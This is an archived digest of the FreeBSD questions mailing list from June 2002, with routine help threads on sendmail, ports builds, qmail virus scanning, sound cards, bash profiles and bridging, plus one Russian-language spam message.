this if I can avoid it.) > > If the answers are "correct", "yes" and "no" it's the setup I > want. :-) > > Thanks once more for your answers. > > Best regards, > Paul If it helps, feel free to email me directly and explain your exact problem and wishes in swedish and I will try to help you out. Swedish is my native language and Im fairly experienced in the ways of Sendmail so Im sure we can figure it out. Basically, using sendmail_enable=NO should allow you to send mail from localhost, but not from any other host. This is probably what you want. As for stopping people from relaying spam through you, newer versions of sendmail has pretty tight relay settings by default so I dont think you need to worry. If you want to, I could help you test it and/or explain how to adjust the relay rules yourself. -- R To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 7:24:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.nsu.ru (mx.nsu.ru [193.124.215.71]) by hub.freebsd.org (Postfix) with ESMTP id 8EC7C37B403 for ; Tue, 25 Jun 2002 07:24:12 -0700 (PDT) Received: from drweb by mail.nsu.ru with drweb-scanned (Exim 3.20 #1) id 17MrEk-0000EY-00 for questions@freebsd.org; Tue, 25 Jun 2002 21:24:06 +0700 Received: from uni.land3.nsu.ru ([193.124.213.230] helo=land3.nsu.ru) by mail.nsu.ru with esmtp (Exim 3.20 #1) id 17MrEj-0000DN-00 for questions@freebsd.org; Tue, 25 Jun 2002 21:24:05 +0700 Received: from land3.nsu.ru (localhost [127.0.0.1]) by land3.nsu.ru (8.12.3/8.11.6) with ESMTP id g5PEFDqw080711 for ; Tue, 25 Jun 2002 21:15:13 +0700 (NOVST) (envelope-from lucky@land3.nsu.ru) Received: from localhost (lucky@localhost) by land3.nsu.ru (8.12.3/8.12.3/Submit) with ESMTP id g5PEFDYf088926 for ; Tue, 25 Jun 2002 21:15:13 +0700 (NOVST) Date: Tue, 25 Jun 2002 21:15:13 +0700 (NOVST) From: Alexey Privalov To: questions@freebsd.org Subject: ports in 4.6 Message-ID: <20020625211500.L13414-100000@land3.nsu.ru> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Envelope-To: questions@freebsd.org Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG hi all. i cann`t make some ports: root@land3# make ===> Extracting for isc-dhcp3-3.0.1.r9 >> Checksum OK for dhcp-3.0.1rc9.tar.gz. ===> Applying FreeBSD patches for isc-dhcp3-3.0.1.r9 -e: not found *** Error code 127 Stop in /usr/ports/net/isc-dhcp3. root@land3# pwd /usr/ports/net/isc-dhcp3 root@land3# uname -a FreeBSD land3.nsu.ru 4.6-STABLE FreeBSD 4.6-STABLE #0: Tue Jun 18 15:27:13 NOVST 2002 lucky@land3.nsu.ru:/usr/src/sys/compile/land3 i386 same happend with httpd2. best regards, Alexey. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 7:43:12 2002 Delivered-To: freebsd-questions@freebsd.org Received: from gatesrv.RZ.UniBw-Muenchen.de (gatesrv.RZ.UniBw-Muenchen.de [137.193.11.27]) by hub.freebsd.org (Postfix) with ESMTP id 9964837B4BC for ; Tue, 25 Jun 2002 07:42:25 -0700 (PDT) Received: from nemesis.informatik.unibw-muenchen.de (nemesis.Informatik.UniBw-Muenchen.de [137.193.60.30]) by gatesrv.RZ.UniBw-Muenchen.de (8.11.2/8.11.2) with ESMTP id g5PEb1G16282; Tue, 25 Jun 2002 16:37:01 +0200 (MEST) Received: from localhost (localhost.informatik.unibw-muenchen.de [127.0.0.1]) by nemesis.informatik.unibw-muenchen.de (Postfix) with ESMTP id 76BA85A548; Tue, 25 Jun 2002 16:37:00 +0200 (CEST) Received: by nemesis.informatik.unibw-muenchen.de (Postfix, from userid 1001) id 899FB5A546; Tue, 25 Jun 2002 16:36:59 +0200 (CEST) Date: Tue, 25 Jun 2002 16:36:59 +0200 From: Oliver Braun To: questions@FreeBSD.ORG Cc: cyrille.lefevre@laposte.net, lucky@land3.nsu.ru Subject: Re: ports in 4.6 Message-ID: <20020625143659.GA59979@informatik.unibw-muenchen.de> Mail-Followup-To: Oliver Braun , questions@FreeBSD.ORG, cyrille.lefevre@laposte.net, lucky@land3.nsu.ru References: <20020625211500.L13414-100000@land3.nsu.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020625211500.L13414-100000@land3.nsu.ru> Organization: University of the Federal Armed Forces Munich, Germany X-Mailer: Mutt http://www.mutt.org/ X-OS: FreeBSD 4.6-STABLE i386 http://www.freebsd.org/ X-Newsreader: SLRN http://www.slrn.org/ X-Uptime: 4 days X-URL: http://ist.unibw-muenchen.de/People/obraun X-Accept-Language: de en X-Location: Europe, Germany, Munich X-Editor: Vim-601 http://www.vim.org/ User-Agent: Mutt/1.5.1i X-Virus-Scanned: by AMaViS snapshot-20020300 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG * Alexey Privalov [2002-06-25 16:26]: > i cann`t make some ports: > root@land3# make > ===> Extracting for isc-dhcp3-3.0.1.r9 > >> Checksum OK for dhcp-3.0.1rc9.tar.gz. > ===> Applying FreeBSD patches for isc-dhcp3-3.0.1.r9 > -e: not found > *** Error code 127 workarround: make USE_REINPLACE=yes Cyrille, USE_REINPLACE=yes has to be defined before including bsd.port.pre.mk. Regards, Olli -- IST & IIS _ INF _ UniBwM ___________ http://ist.unibw-muenchen.de/People/obraun/ Tele-Consulting GmbH _______________ http://www.tele-consulting.com/ ___ obraun@ FreeBSD: The Power To Serve ________ http://www.freebsd.org/ ___________________ GnuPG: 0xEF25B1BA Fingerprint: 6A3B 042A 732E 17E4 B6E7 3EAF C0B1 6B7D EF25 B1BA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 7:55:32 2002 Delivered-To: freebsd-questions@freebsd.org Received: from CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com (CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com [24.103.39.131]) by hub.freebsd.org (Postfix) with SMTP id 4A30A37B408 for ; Tue, 25 Jun 2002 07:55:19 -0700 (PDT) Received: (qmail 79936 invoked from network); 25 Jun 2002 14:55:37 -0000 Received: from unknown (HELO vsivyoung) (66.46.21.253) by cpe0004761ac738-cm00109515bc65.cpe.net.cable.rogers.com with SMTP; 25 Jun 2002 14:55:37 -0000 Message-ID: <004801c21c58$873bfaf0$c801a8c0@vsivyoung> From: "Miroslav Pendev" To: Cc: "freebsd-questions" References: <20020622070316.GA15644@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> <16612008897.20020622121858@dds.nl> <4.2.0.58.20020622135159.0098dd90@pop.netzero.net> <20020622194231.GA19270@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> <108691970140.20020625170624@opti-telecom.ru> Subject: Re: Re[2]: The virus spreading around Date: Tue, 25 Jun 2002 10:56:41 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi Andrew, > Dear Miroslav, > > Sunday, June 23, 2002, 12:42:31 AM, you wrote: > > MP> hehe ;-))) My mail server (q-mail) is a nice guy and so far is > MP> working without problems... > > MP> Before 4.6 RELEASE I was with 4.5 and qmail + odeiavir + F-Prot > MP> for virus check of all incomming e-mails. > > I've fucked up my poor brains with anology chain : qmail + odeiavir > 0.4.4 + McAfee 4.16 - it still doesnt work ! > Infected messages are recognized and a sender informed, but no local delivery at all ! > Even clean messages disappears ! Ok, I got 4.6 with q-mail and odeiavir + f-prot working again, few days ago. I am working on port for odeiavir for FreeBSD and I will send it for *approval* soon ;-) Try to put into ~user_homedir/.qmail file one more row with your delivery metod. For Maildir delivery, for example your .qmail must looks like this: |/usr/local/bin/odeiavir -ns /home/your_user_name/Maildir/ please note: I changed the default location for odeaivir. -ns is to not send warrning to the sender. The second row is for you delivery metod be shure to put there your correct maildir name. try man dot-qmail to read more about .qmail file ;-) (I gues qmail/man is in your 'manpath') > Can you prompt where I might make a mistake. > I guess it's in config. There is a line like "bin_mail_cm /bin/mail > $u", but there is no sendmail at this box at all. I've try to write > "bin_mail_cm /var/qmail/bin/sendmail $u" - nothing changed ( > > Best regards, > Andrew mailto:brian@opti-telecom.ru > Do not bother with bin_mail_cmd it is for 'sendmail' delivery. Did you made 'make disable-sendmail' and 'make enable-qmail' when you install qmail? This will replace sendmail with qmail at all! Hope that helps! --Miro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 7:57:17 2002 Delivered-To: freebsd-questions@freebsd.org Received: from agent.creson.com (h180n2fls31o1104.telia.com [217.210.107.180]) by hub.freebsd.org (Postfix) with ESMTP id 2E89237B401 for ; Tue, 25 Jun 2002 07:57:13 -0700 (PDT) Received: by agent.creson.com (Postfix, from userid 1001) id 3FDD679F; Tue, 25 Jun 2002 16:54:34 +0200 (CEST) Date: Tue, 25 Jun 2002 16:54:34 +0200 From: Tor Stormwall To: freebsd-questions@FreeBSD.ORG Subject: VIA VT8233 dosen't work Message-ID: <20020625165434.A6626@agent> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi! I've got a VIA VT8233. I tried to get it working by loading the module snd. /dev/sndstat gives me this: ring:tor$ cat /dev/sndstat FreeBSD Audio Driver (newpcm) Installed devices: pcm0: at io 0xe800 irq 10 (1p/1r/0v channels duplex) When I try to play a mp3-file with mpg123 the output is: pcm0:play:0: play interrupt timeout, channel dead What's wrong? Best Regards, Tor Stormwall -- -------------------------------------------------------------- M A Y T H E S O U R C E B E W I T H Y O U Tor Stormwall http://creson.com/~tor tor@stormwall.org www.stormwall.org -------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 7:57:52 2002 Delivered-To: freebsd-questions@freebsd.org Received: from agent.creson.com (h180n2fls31o1104.telia.com [217.210.107.180]) by hub.freebsd.org (Postfix) with ESMTP id 26A0437B401 for ; Tue, 25 Jun 2002 07:57:46 -0700 (PDT) Received: by agent.creson.com (Postfix, from userid 1001) id 709B1771; Tue, 25 Jun 2002 16:58:11 +0200 (CEST) Date: Tue, 25 Jun 2002 16:58:11 +0200 From: Tor Stormwall To: freebsd-questions@FreeBSD.ORG Subject: VIA VT8233 dosen't work Message-ID: <20020625165811.A6769@agent> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi! I've got a VIA VT8233. I tried to get it working by loading the module snd. /dev/sndstat gives me this: ring:tor$ cat /dev/sndstat FreeBSD Audio Driver (newpcm) Installed devices: pcm0: at io 0xe800 irq 10 (1p/1r/0v channels duplex) When I try to play a mp3-file with mpg123 the output is: pcm0:play:0: play interrupt timeout, channel dead What's wrong? Best Regards, Tor Stormwall -- -------------------------------------------------------------- M A Y T H E S O U R C E B E W I T H Y O U Tor Stormwall http://creson.com/~tor tor@stormwall.org www.stormwall.org -------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 7:59:32 2002 Delivered-To: freebsd-questions@freebsd.org Received: from relay.sergeax.ru (svc990161.ll.zenon.net [195.2.82.144]) by hub.freebsd.org (Postfix) with ESMTP id 84AD637B42F for ; Tue, 25 Jun 2002 07:58:14 -0700 (PDT) Received: from [195.2.82.144] (HELO sergeax-ru) by relay.sergeax.ru (CommuniGate Pro SMTP 3.5.4) with SMTP id 1214020 for freebsd-questions@freebsd.org; Tue, 25 Jun 2002 18:58:03 +0400 Subject: äÁ×ÁÊÔÅ ÚÎÁËÏÍÉÔØÓÑ :) From: info@scootershop.ru To: freebsd-questions@freebsd.org X-Mailer: ActiveX Server Component SMTP Version 1.0.6 X-Sender: sergeax-ru MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: 8bit Date: Tue, 25 Jun 2002 18:58:03 +0400 Message-ID: Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG *This message was transferred with a trial version of CommuniGate(tm) Pro* óëõôåò – ÜÔÏ ËÏÍÐÁËÔÎÙÊ ÑÐÏÎÓËÉÊ ÍÏÔÏÃÉËÌ, ÏÔÌÉÞÁÀÝÉÊÓÑ ÐÌÁ×ÎÏÓÔØÀ ÈÏÄÁ, ÔÒÁÄÉÃÉÏÎÎÏÊ ÄÌÑ ñÐÏÎÉÉ ÎÁÄÅÖÎÏÓÔØÀ É ÎÅ ÔÒÅÂÕÀÝÉÊ ×ÏÄÉÔÅÌØÓËÉÈ ÐÒÁ×. ïóîï÷îùå ëáþåóô÷á – ËÏÍÆÏÒÔ, ÂÅÚÏÐÁÓÎÏÓÔØ, ÄÏÓÔÕÐÎÏÓÔØ (ÏÔ 300 $). ÷ òÏÓÓÉÉ ÓËÕÔÅÒ – ÜÔÏ ÐÒÅËÒÁÓÎÙÊ É ÎÅÄÏÒÏÇÏÊ ÐÏÄÁÒÏË ÄÌÑ ÷ÁÓ, ÷ÁÛÉÈ ÄÅÔÅÊ É ×ÓÅÊ ÷ÁÛÅÊ ÓÅÍØÉ. õÄÏÂÅÎ, ËÁË ÎÁ ÄÁÞÅ, ÔÁË É × ÇÏÒÏÄÅ. îÁ ÎÅÍ ÍÏÖÎÏ ÅÚÄÉÔØ ÎÁ ÒÅÞËÕ, × ÉÎÓÔÉÔÕÔ, × ÛËÏÌÕ, × ÓÐÏÒÔËÌÕÂ É Ô.Ä. óëõôåò – ÜÔÏ ÎÏ×ÏÅ Õ×ÌÅÞÅÎÉÅ É ÎÏ×ÙÅ ÄÒÕÚØÑ. íù (óËÕÔÅÒûÏÐ) ÚÁÎÉÍÁÅÍÓÑ ÐÒÏÄÁÖÅÊ É ÒÅÍÏÎÔÏÍ Â/Õ ÑÐÏÎÓËÉÈ ÓËÕÔÅÒÏ× ÕÖÅ ÂÏÌÅÅ 5-É ÌÅÔ. îÁÛÉ ÓËÕÔÅÒÁ ÏÔÌÉÞÁÅÔ ×ÙÓÏËÉÊ ÕÒÏ×ÅÎØ ÂÅÓÐÒÏÂÌÅÍÎÏÓÔÉ. ôÏ ÅÓÔØ, ÷Ù ÐÒÏÓÔÏ ËÁÔÁÅÔÅÓØ É ÎÅ ÄÕÍÁÅÔÅ Ï ÒÅÍÏÎÔÅ. üÔÏ ÄÏÓÔÉÇÁÅÔÓÑ ÓÐÅÃÉÁÌØÎÏÊ ÔÅÈÎÉÞÅÓËÏÊ ÐÏÄÇÏÔÏ×ËÏÊ ÎÁÛÉÈ ÍÁÛÉÎ. íù ÐÒÏÄÁÅÍ ÓËÕÔÅÒÁ ÔÁËÉÈ ÉÚ×ÅÓÔÎÙÈ ÍÁÒÏË, ËÁË Honda, Yamaha, Suzuki. íù ÎÁÈÏÄÉÍÓÑ × íÏÓË×Å, ÎÏ ÒÁÂÏÔÁÅÍ ÐÏ ×ÓÅÊ ÔÅÒÒÉÔÏÒÉÉ òÏÓÓÉÉ. âÏÌÅÅ ÐÏÄÒÏÂÎÕÀ ÉÎÆÏÒÍÁÃÉÀ ÷Ù ÍÏÖÅÔÅ ÐÏÌÕÞÉÔØ ÎÁ ÎÁÛÅÍ ÓÁÊÔÅ: http://www.scootershop.ru/ ÉÌÉ ÐÏ ÔÅÌÅÆÏÎÁÍ × íÏÓË×Å: 905-54-07, 798-17-19, 755-8053, 778-1928, 489-4096. ó Õ×ÁÖÅÎÉÅÍ, áÌÅËÓÅÊ äÅÒÕÎÏ×, ÍÅÎÅÄÖÅÒ ÐÏ ÒÅËÌÁÍÅ. e-mail: alexeyvt@scootershop.ru icq: 160878658 P.S. íÙ ÐÒÉÎÏÓÉÍ Ó×ÏÉ ÉÚ×ÉÎÅÎÉÑ, ÅÓÌÉ ÜÔÏ ÓÏÏÂÝÅÎÉÅ ×ÙÚ×ÁÌÏ Õ ÷ÁÓ ÎÅÇÁÔÉ×ÎÕÀ ÒÅÁËÃÉÀ. åÓÌÉ ÖÅ ×Ù ÖÅÌÁÅÔÅ É ×ÐÒÅÄØ ÐÏÌÕÞÁÔØ ÉÎÆÏÒÍÁÃÉÀ Ï ÎÏ×ÙÈ ÍÏÄÅÌÑÈ, ÓËÉÄËÁÈ É ÓÐÅÃÐÒÅÄÌÏÖÅÎÉÑÈ, ÐÏÄÐÉÛÉÔÅÓØ ÎÁ ÎÏ×ÏÓÔÉ ÎÁ ÎÁÛÅÍ ÓÁÊÔÅ: www.scootershop.ru. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 8: 5:31 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail2.eagle.ca (mail2.eagle.ca [209.167.16.30]) by hub.freebsd.org (Postfix) with ESMTP id 18B8F37B400 for ; Tue, 25 Jun 2002 08:05:21 -0700 (PDT) Received: from afi (staff.eagle.ca [209.167.16.15]) by mail2.eagle.ca (8.11.3/8.11.3) with SMTP id g5PF2bM62893 for ; Tue, 25 Jun 2002 11:02:37 -0400 (EDT) (envelope-from lists@brenius.com) Message-ID: <000701c21c59$ba6b5aa0$7b01a8c0@afi> From: To: Subject: Permissions required for bash Date: Tue, 25 Jun 2002 11:05:22 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I am having troubles activating my bash profile for root... Specifically after changing some permissions: drwxr-xr-x 4 root wheel 512 Jun 24 23:34 . drwxr-xr-x 19 root wheel 512 Jun 24 16:46 .. -rw-r----- 1 root wheel 0 Jun 24 23:34 .addressbook -rw-r----- 1 root wheel 2285 Jun 24 23:34 .addressbook.lu -rw------- 1 root wheel 133 Jun 25 10:37 .bash_history -rw-r--r-- 1 root wheel 1241 Jun 24 23:11 .bash_profile -rw-r--r-- 1 root wheel 1079 Jun 24 23:00 .bashrc -rw-r----- 2 root wheel 804 Jun 24 22:50 .cshrc -rw-r----- 1 root wheel 2894 Jun 24 22:12 .history -rw-r----- 1 root wheel 142 Jun 11 00:20 .klogin -rw-r----- 1 root wheel 297 Jun 11 00:20 .login -rw-r----- 1 root wheel 14616 Jun 24 23:34 .pinerc -rw-r----- 2 root wheel 251 Jun 11 00:20 .profile drwxr-xr-x 2 root wheel 512 Jun 24 21:02 .ssh drwx------ 2 root wheel 512 Jun 24 23:43 mail What would the tightest permissions I could have without loosing shell (bash in this case) usability? #su su-2.05a# Which should be: #su ==[root] ~ # (which reads my .bash_profile) I only get the second one when I do "su -" (which I don't understand). And what is the difference between .bashrc and .bash_profile? P.S. How do I add the server name to the prompt as well? Thank you! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 8:21:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by hub.freebsd.org (Postfix) with ESMTP id 60E8C37B77C for ; Tue, 25 Jun 2002 08:20:17 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by cactus.fi.uba.ar (8.11.6/8.11.6) with ESMTP id g5PFIZP13038; Tue, 25 Jun 2002 12:18:35 -0300 (ART) (envelope-from fgleiser@cactus.fi.uba.ar) Date: Tue, 25 Jun 2002 12:18:35 -0300 (ART) From: Fernando Gleiser X-X-Sender: To: Cc: Subject: Re: Permissions required for bash In-Reply-To: <000701c21c59$ba6b5aa0$7b01a8c0@afi> Message-ID: <20020625121157.D403-100000@localhost> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002 lists@brenius.com wrote: > I am having troubles activating my bash profile for root... > > #su > su-2.05a# > > Which should be: > > #su > ==[root] ~ # (which reads my .bash_profile) Nope. If you want your new shell to read your .profile, you must do a 'su -' > > I only get the second one when I do "su -" (which I don't understand). When you 'su -', it will simulate a login shell which in fact reads .profile. when you 'su', it won't simulate a login shell and won't read .profile. > > And what is the difference between .bashrc and .bash_profile? .bash_profile (or .profile) is read only by a login shell. .bashrc (or .shrc) is read by every new shell. It is explained in sh(1) or bash(1). Fer > > P.S. How do I add the server name to the prompt as well? > > > Thank you! > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 8:49:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail2.intelnet.net.gt (mail12.intelnet.net.gt [216.230.128.18]) by hub.freebsd.org (Postfix) with ESMTP id A1A7937B406 for ; Tue, 25 Jun 2002 08:49:15 -0700 (PDT) Received: from jogega (UD16-140.intelnet.net.gt [10.150.2.16] (may be forged)) by mail2.intelnet.net.gt (Pro-8.9.3/8.9.3) with SMTP id JAA15004; Tue, 25 Jun 2002 09:55:43 +0600 (GMT) From: "jogegabsd" To: "Remington L." , Subject: RE: Sony? Date: Tue, 25 Jun 2002 09:49:05 -0600 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <000101c21c12$d4e917b0$ba038bd8@bathoryaria> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > I have a Sony Vaio GRX-590(Intel P4 1.6GHZ, 512MB RAM, Mobility Radeom > 7500, DVD/CD-RW). I want to install FreeBSD 4.6 on it. Does > anyone know > of potential problems that mioght occur on install and things of that > nature. Its my first laptop and I know the hardware is really > different > than a tower. I just want to know if there are any unforeseen problems > in store for me I have compaq laptop with a Mobility Radeon Card, Well supported with the Xfree 4.2.0 and my dvd/cd-rw is a toshiba SD-R2002 and it was succesfully detected, can see DVD's and burn cd's with no problem. Sound card works fine(although the kernel needs some extra options) and with the processor and memory you have, there should be no problem. Any other question you can mail me. Sorry to mail this with another address but I can send email with the original one. So you can mail me to the both of them no problem. HTH Gerardo Amaya To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 8:50:42 2002 Delivered-To: freebsd-questions@freebsd.org Received: from scanmail1.cableone.net (scanmail1.cableone.net [24.116.0.121]) by hub.freebsd.org (Postfix) with ESMTP id 146FB37B408 for ; Tue, 25 Jun 2002 08:50:34 -0700 (PDT) Received: from scanmail1.cableone.net ([10.116.0.121]) by scanmail1.cableone.net with Microsoft SMTPSVC(5.5.1877.687.68); Tue, 25 Jun 2002 08:45:47 -0700 Received: from scanmail1.cableone.net [24.116.0.121] by scanmail1.cableone.net (SMTPD32-7.04) id A02BB42800CC; Tue, 25 Jun 2002 08:45:47 -0700 Received: from (179-27.bilcpe.cableone.net [24.116.179.27]) by mail.cableone.net with SMTP (MailShield v2.04 - WIN32 Jul 17 2001 17:12:42); Tue, 25 Jun 2002 08:45:46 -0600 Date: Tue, 25 Jun 2002 10:50:25 -0500 (CDT) From: Denny White To: freebsd-questions@freebsd.org Subject: system error message help Message-ID: <20020625104758.X929-100000@hal.cableone.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-SMTP-HELO: hal.cableone.net X-SMTP-MAIL-FROM: dennyboy@cableone.net X-SMTP-RCPT-TO: freebsd-questions@freebsd.org X-SMTP-PEER-INFO: 179-27.bilcpe.cableone.net [24.116.179.27] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 can someone please help me decypher the following error message: sm-msp-queue[7011: n5P1gurl007011: SYSERR(root): fill_fd: disconnect: fd1 not open: Badfile descriptor "Windows is the Virus, Linux is the Vaccine, FreeBSD is the Cure!" -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE9GJFJy0Ty5RZE55oRAsJ7AKDI3r8yd+yrDplzJSYjLenj7YE/+ACfQwIM T3Ucw+BPyfsTbbUP67RvqZc= =EHJE -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 8:54:49 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mind-techno.fr (cryptomail.mind-techno.fr [194.250.232.141]) by hub.freebsd.org (Postfix) with ESMTP id 7E82A37B404 for ; Tue, 25 Jun 2002 08:54:12 -0700 (PDT) Received: from [194.250.232.35] (account fbellone HELO fanny) by mind-techno.fr (CommuniGate Pro SMTP 3.5.1) with ESMTP id 281738 for freebsd-questions@FreeBSD.ORG; Tue, 25 Jun 2002 17:54:10 +0200 Message-ID: <001301c21c60$6bd62670$23e8fac2@fanny> Reply-To: "Fanny Bellone" From: "Fanny Bellone" To: Subject: Bridge with Firewalling Date: Tue, 25 Jun 2002 17:53:17 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0010_01C21C71.2F4CA6F0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG C'est un message de format MIME en plusieurs parties. ------=_NextPart_000_0010_01C21C71.2F4CA6F0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi, I've an Advantec Server, with 2 ethernet ports and 1 ethernet port on = PCI card. This server is a bi-processor, 2 x INTEL PENTIUM III 1GHZ. I've installed Free BSD 4.5 on it for doing a bridge filtering. After, I've followed the = http://www.freebsd.org/doc/en_US.ISO8859-1/articles/filtering-bridges/ind= ex.html method to add the bridge functionnalities. I haven't error message, when I put my interfaces on promiscius mode and = after when I enabling the bridge on it. If I verify this operation with ifconfig my interfaces are on the well = mode, but there are no bridging between them. I've tested to used different interfaces but with no success. Instead of the bridge, the IP Forwarding runs normally. Could you please help me !!! Thanks in advance F. Bellone ------=_NextPart_000_0010_01C21C71.2F4CA6F0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi,
 
I've an Advantec Server, with 2 ethernet = ports and=20 1 ethernet port on PCI card.
 
This server is a bi-processor, 2 x INTEL = PENTIUM=20 III 1GHZ.
 
I've installed Free BSD 4.5 on it for = doing a=20 bridge filtering.
 
After, I've followed the http://www.freebsd.org/doc/en_US.ISO8859-1/articles/filt= ering-bridges/index.html method=20 to add the bridge functionnalities.
 
I haven't error message, when I put my = interfaces=20 on promiscius mode and after when I enabling the bridge on = it.
 
If I verify this operation with=20 ifconfig my interfaces are on the well mode, but there are no = bridging=20 between them.
 
I've tested to used different interfaces = but with=20 no success.
 
Instead of the bridge, the IP Forwarding = runs=20 normally.
 
Could you please help me = !!!
 
Thanks in advance
 
F. Bellone
 
